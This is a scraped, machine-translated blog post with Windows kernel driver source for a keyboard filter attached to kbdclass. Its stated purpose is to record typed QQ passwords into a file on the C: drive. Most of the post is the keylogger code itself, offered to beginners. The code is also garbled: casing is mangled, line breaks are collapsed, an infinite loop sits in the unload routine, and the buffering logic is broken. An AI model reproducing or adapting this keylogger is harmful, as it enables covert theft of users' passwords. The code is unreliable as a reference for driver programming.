Windows Driver Filter--kdbclass filter, Cold river alone fishing enhanced version

Source: Internet
Author: User

Cold River Alone Fishing keyboard filter, modified under, filter QQ password write buff, there is a carriage return or buff full write file, because the IRP is complete, the IRP corresponds to the memory of the fast recovery, so with the global buffer. Open a thread to write, and began to use the team example of a processing IRP, but found that relatively slow, have to do so. Create a process callback code add a few lines, this is not written, because the code is missing, is a kind of approximate code it. For beginners to share under. Wrong point, thank you.

Seniors, don't laughed at.

Struct.h

/************************************///author:duanyueming//data:02/05/2015//file:lstruct.h/****************** /#ifndef _lstruct_h_#define _lstruct_h_typedef struct _device_extension {pdevice_object pdeviceobj ; Pdevice_object Pattachdev; Upper equipment Pdevice_object Plowdevice; Bottom equipment Pdevice_object pstoragedev; The stored device pdevice_object Ptardevice; Target device unicode_string Mydevicename; Unicode_string Mydevicesym; ULONG Pmydevflg;io_remove_lock Movelock;} device_extension,*pdevice_extension;typedef struct _multvar{  PVOID pbuff;  KEVENT waitevent;  ULONG  Length;} Multvar,*pmultvar; #define  buff_size 256typedef struct _my_buff{puchar pbuf;int maxsize;int cursize;int Offset;} mybuff,*pmybuff;typedef struct  _my_data{   pirp Irp; PVOID Pbuff; List_entry ListEntry;} My_data,*pmydata;

  

#define  mydeviceflags ' LUNA ' #define  mycdodeviceflags ' LCDO ' #define  removetag  ' lmn ' #define Delay_ One_microsecond   ( -10) #define Delay_one_millisecond   (delay_one_microsecond*1000) #define Delay_one_second        (delay_one_millisecond*1000) #define IS_MY_DEVICE_OBJECT (_obj)  (((pdevice_extension) _obj->deviceextension)->pmydevflg = = Mycdodeviceflags | | Pdevice_extension (_obj->deviceextension)->PMYDEVFLG = = mydeviceflags) #define Is_my_control_device (_obj)  (((pdevice_extension) _obj->deviceextension)->pmydevflg = = mycdodeviceflags)

  

/******** not archived function ************/ntstatusobreferenceobjectbyname (punicode_string objectname,ulong Attributes,PACCESS_ State accessstate,access_mask Desiredaccess,pobject_type Objecttype,kprocessor_mode AccessMode,PVOID ParseContext, PVOID *object); extern pobject_type *iodriverobjecttype;

  

NTSTATUS lqueryobjectname (PVOID lobject,punicode_string name)//query file name {NTSTATUS status; Pobject_name_information Pbuff; WCHAR cache[64]; ULONG Needlength;pbuff = (pobject_name_information) cache;status = obquerynamestring (lobject,pbuff,64*sizeof (WCHAR), &needlength), if (status = = Status_info_length_mismatch) {Pbuff = (pobject_name_information) ExAllocatePool ( Nonpagedpool,needlength); if (Pbuff = = NULL) {return status_insufficient_resources;} RtlZeroMemory (pbuff,needlength); status = Obquerynamestring (Lobject,pbuff,needlength,&needlength);} name->length = 0; Rtlcopyunicodestring (name,&pbuff->name); return status;} VOID luninstalldriver (Pdriver_object pdriverobject) {pdevice_extension pdevext; Prkthread CurrentThread; Large_integer time; Pdevice_object pdevobj;time = Rtlconvertlongtolargeinteger (100*delay_one_second);pD evobj = pDriverObject-> DeviceObject; CurrentThread = Kegetcurrentthread (); Kesetprioritythread (currentthread,low_realtime_priority); while (pdevobj) {Pdevext = (pdevice_extension) Pdevobj->deviceextension;iodeletesymboliclink (&pdevext->mydevicesym);pD evobj = pDevObj-> Nextdevice;iodetachdevice (Pdevext->plowdevice); Iodeletedevice (pdevext->pdeviceobj);} while (1) {}kdprint (("Driver UnInstall complete,leave\n");} NTSTATUS ldispatchroutine (pdevice_object pdeviceobject,pirp pirp) {pio_stack_location STACK = Iogetcurrentirpstacklocation (PIRP); ioskipcurrentirpstacklocation (PIRP); return IoCallDriver (((PDEVICE_EXTENSION) pdeviceobject->deviceextension)->plowdevice,pirp);}

The following is the code:

#include "QFilter.h" NTSTATUS driverentry (pdriver_object pdriverobject,punicode_string pregistrypath) {int i; NTSTATUS status; HANDLE thread;/******** initializes global variables ***********/iswritedata = False;isneedfilter = False;initializelisthead (&g_list); G_buff = (pmybuff) exallocatepool (nonpagedpool,sizeof (Mybuff)), if (G_buff ==null) {Kdprint (("No Through memory \ n")); return 0;} Else{g_buff->pbuf = (Puchar) exallocatepool (nonpagedpool,buff_size); ASSERT (g_buff->pbuf); g_buff->maxsize = Buff_size;g_buff->offset = 0;g_buff->cursize = 0;} /******** Initialize global variable ***********/pdriverobject->driverunload = luninstalldriver;for (i = 0;i <irp_mj_maximum_ function;i++) {Pdriverobject->majorfunction[i] = ldispatchroutine;} Pdriverobject->majorfunction[irp_mj_read] = Readroutine;pdriverobject->majorfunction[irp_mj_power] = Powerroutine;pdriverobject->majorfunction[irp_mj_device_control] = contrlroutine;//pdriverobject-> Majorfunction[irp_mj_close] = Closeirp;status = Createmycdodevice (pdriverobjeCT); if (! Nt_success (status) {return status;} Status = Bindkbddriver (Pdriverobject); Nt_success (status) {return status;} Status = Pscreatesystemthread (&thread,generic_all,null,null,null,processirp,null); Nt_success (status) {Kdprint ("Create Thread Failed \ n"); return status;} Kdprint ("Start Kbd Filter successfuly \ n"); return status_success;} VOID processirp (PVOID pContext) {//pmydata data;    PVOID buff = NULL;    for (;;) {//Plist_entry Headdata = Removeheadlist (&g_list);//data = Containing_record (headdata,my_data,listentry); if (I Swritedata = = true&& G_buff->pbuf! = NULL) {Kdprint (("hehehehe\n")); Kdprint (("111\n")); Kdprint (("2222\n")); Mywritedatafile ();    RtlZeroMemory (g_buff->pbuf,g_buff->maxsize); g_buff->cursize = 0;g_buff->offset = 0;}   }}ntstatus powerroutine (pdevice_object pdeviceobj,pirp pirp) {postartnextpowerirp (PIRP);   Ioskipcurrentirpstacklocation (PIRP); Return Pocalldriver (((pdevice_extension) pdeviceobj->deviceextension)-&GT;PLOWDEVICE,PIRP);} NTSTATUS Createmycdodevice (Pdriver_object pdriverobj) {NTSTATUS status; Unicode_string Devsym; Unicode_string Devname; Pdevice_object Pnewdev; Pdevice_extension Pdevext; Rtlinitunicodestring (&devname,l "\\Device\\QFilter"); status = IoCreateDevice (Pdriverobj,sizeof (device_ EXTENSION), &devname,file_device_unknown,0,true,&pnewdev); if (!   Nt_success (status) {Kdprint ("Create CDO devobj Failed \ n")); return status;} Rtlinitunicodestring (&devsym,l "\ \??    \\QFilterSym "); Status = Iocreatesymboliclink (&devsym,&devname); Nt_success (status) {Kdprint ("Create Cdo symbolic Failed \ n"); Iodeletedevice (Pnewdev); return status;} Pnewdev->flags |=do_buffered_io;pdevext = (pdevice_extension) PNEWDEV-&GT;DEVICEEXTENSION;PDEVEXT-&GT;PMYDEVFLG = Mycdodeviceflags;pdevext->mydevicename = Devname;pdevext->pdeviceobj = Pnewdev;pdevext->mydevicesym = Devsym;return status_success;} NTSTATUS bindkbddriver (Pdriver_object pdriverobj) {unicode_string kbdclass; PdeviCe_object Pnewdev; Pdevice_object Ptardev; Pdevice_object Plowdev; Pdevice_extension Pdevext; Pdriver_object Pkbddrob; NTSTATUS status = Status_success; Rtlinitunicodestring (&kbdclass,l "\\Driver\\kbdclass"); status = Obreferenceobjectbyname (&kbdclass,obj_ Case_insensitive,null,0,*iodriverobjecttype,kernelmode,null, (pvoid*) &pkbddrob); Nt_success (status) {Kdprint ("Load kbdobj Failed:%x\n", status); return status;} Obdereferenceobject (pkbddrob);p Tardev = Pkbddrob->deviceobject;while (ptardev) {status = IoCreateDevice ( Pdriverobj,sizeof (device_extension), Null,ptardev->devicetype,ptardev->characteristics,false,&pnewdev ); if (! Nt_success (status) {Kdprint ("Create Device failed:%x\n", status); return status;} Else{status = Ioattachdevicetodevicestacksafe (Pnewdev,ptardev,&plowdev);    Nt_success (status) {Kdprint ("Bind Failed \ n"); return status;} Pdevext = (pdevice_extension) pnewdev->deviceextension;pnewdev->flags |= plowdev->flags& (DO_BUFFERED_ IO | Do_direct_io | do_power_pagable);p newdev->flags &= ~do_device_initializing;pdevext->pdeviceobj = pNewDev;pDevExt-> PMYDEVFLG = Mydeviceflags;pdevext->plowdevice = Plowdev;pdevext->pattachdev = PTarDev;pNewDev->StackSize = Pdevext->plowdevice->stacksize+1;//ioinitializeremovelock (&pdevext->movelock,0,0,0);} Ptardev = Ptardev->nextdevice;} Rtlinitunicodestring (&filename,l "\\dosdevices\\c:\\luna.txt"); Kdprint (("Complete Device Bind \ n"); return status_success;} VOID Mywritedatafile () {HANDLE handl;object_attributes objattr;io_status_block BLOCK;    NTSTATUS status; Initializeobjectattributes (&objattr,&filename,obj_case_insensitive,null,null); status = ZwCreateFile ( &handl,generic_write,&objattr,&block,null,file_attribute_normal,0,file_open_if,file_synchronous_io _nonalert,null,0); if (! Nt_success (status) {Kdprint ("Create File Storage data failed:%x", status); return;} Status = Zwwritefile (handl,null,null,null,&block,g_buff->pbuf,g_Buff->cursize,0,null); if (! Nt_success (status) {Kdprint ("WriteFile failed:%x \ n", status)); Zwclose (Handl); return;} Kdprint (("Code:%c \ n", g_buff->pbuf)); Zwclose (Handl);} NTSTATUS Readcompletefun (pdevice_object pdeviceobj,pirp pirp,pvoid pContext) {ULONG keystructnum; Pkeyboard_input_data ptr; ULONG i; UCHAR asciicode;if (/*isneedfilter &&*/nt_success (pirp->iostatus.status)) {keystructnum = pIrp->   iostatus.information/(pirp->iostatus.information/sizeof (keyboard_input_data));   ptr = (pkeyboard_input_data) pirp->associatedirp.systembuffer; for (i =0; I <keystructnum;++i) {Asciicode = Print_keystroke (Ptr[i].   Makecode); if (G_buff->offset >= (buff_size-(5*ucharsize)) | | Asciicode = = ' 0x0D ') {kdprint ("Steup Write Data!!!!!!!!!!!!!!!!!!!   \ n "));   Iswritedata =true;   Rtlcopymemory (((G_BUFF-&GT;PBUF) + (G_buff->offset)), &asciicode,ucharsize);   G_buff->offset + = Ucharsize;   G_buff->cursize +=ucharsize; } else {IsWrItedata =false;   Kdprint (("------Buff small---Start Write Data to file--\ n"));   }}} if (pirp->pendingreturned) {iomarkirppending (PIRP); }return Pirp->iostatus.status;}   NTSTATUS readroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK;   NTSTATUS status = Status_success;   if (pirp->currentlocation ==1) {pirp->iostatus.status = Status_invalid_device_request;   pirp->iostatus.information = 0;   IoCompleteRequest (pirp,io_no_increment);   return status_invalid_device_request;   } if (Is_my_control_device (pdeviceobj)) {pirp->iostatus.status = status_success;   pirp->iostatus.information = 0;   IoCompleteRequest (pirp,io_no_increment);   return status_success;   } stack = Iogetcurrentirpstacklocation (PIRP);   Iocopycurrentirpstacklocationtonext (PIRP);  Iosetcompletionroutine (pirp,readcompletefun,null,true,true,true); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);} NTSTATUSContrlroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK = iogetcurrentirpstacklocation (PIRP); if (Is_my_control_device (Pdeviceobj)) {switch (Stack->parameters.deviceiocontrol.iocontrolcode) {}}switch (stack->  Parameters.DeviceIoControl.IoControlCode) {default:ioskipcurrentirpstacklocation (PIRP); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);}}

  

Windows Driver Filter--kdbclass filter, Cold river alone fishing enhanced version

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.